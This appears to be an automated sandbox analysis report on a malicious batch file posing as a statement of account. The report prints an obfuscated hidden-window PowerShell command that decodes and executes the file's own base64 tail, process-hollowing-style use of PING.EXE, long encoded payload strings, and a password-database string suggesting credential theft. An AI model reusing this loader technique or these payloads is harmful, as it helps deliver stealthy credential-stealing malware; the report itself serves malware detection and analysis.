Source: 2.2.powershell.exe.1bed4be0000.1.raw.unpack, cdXfw.cs	Base64 encoded string: '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
Source: 8.2.PING.EXE.6900000.1.raw.unpack, --.cs	Base64 encoded string: 'hvJiJDjgBSyZXpM/lVDzZRt3VfbRZfcc++CcWOsiv4itkSbLzDSObvC899a2Ybp8'
Source: ilgwppf0.dll.9.dr, cdXfw.cs	Base64 encoded string: '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

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winBAT@17/17@3/4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\SnFvakRPVEJj.lock

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6708:120:WilError_03
Source: C:\Windows\SysWOW64\PING.EXE	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6888:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nxnqusfz.0zo.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat" "

Source: C:\Windows\System32\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "ping.exe")

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: PING.EXE, 00000008.00000002.3328916486.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000002.3328916486.0000000004704000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000002.3328916486.0000000004710000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000002.3328916486.00000000046DF000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000002.3328916486.00000000046C0000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: SOA Since OCT DEC 241738316681530012900.bat	ReversingLabs: Detection: 31%
Source: SOA Since OCT DEC 241738316681530012900.bat	Virustotal: Detection: 45%

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM ping.exe /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilgwppf0\ilgwppf0.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD873.tmp" "c:\Users\user\AppData\Local\Temp\ilgwppf0\CSCDCE9C332863C4D8BB51C4E706A50F0F.TMP"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM ping.exe /F	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilgwppf0\ilgwppf0.cmdline"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD873.tmp" "c:\Users\user\AppData\Local\Temp\ilgwppf0\CSCDCE9C332863C4D8BB51C4E706A50F0F.TMP"	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
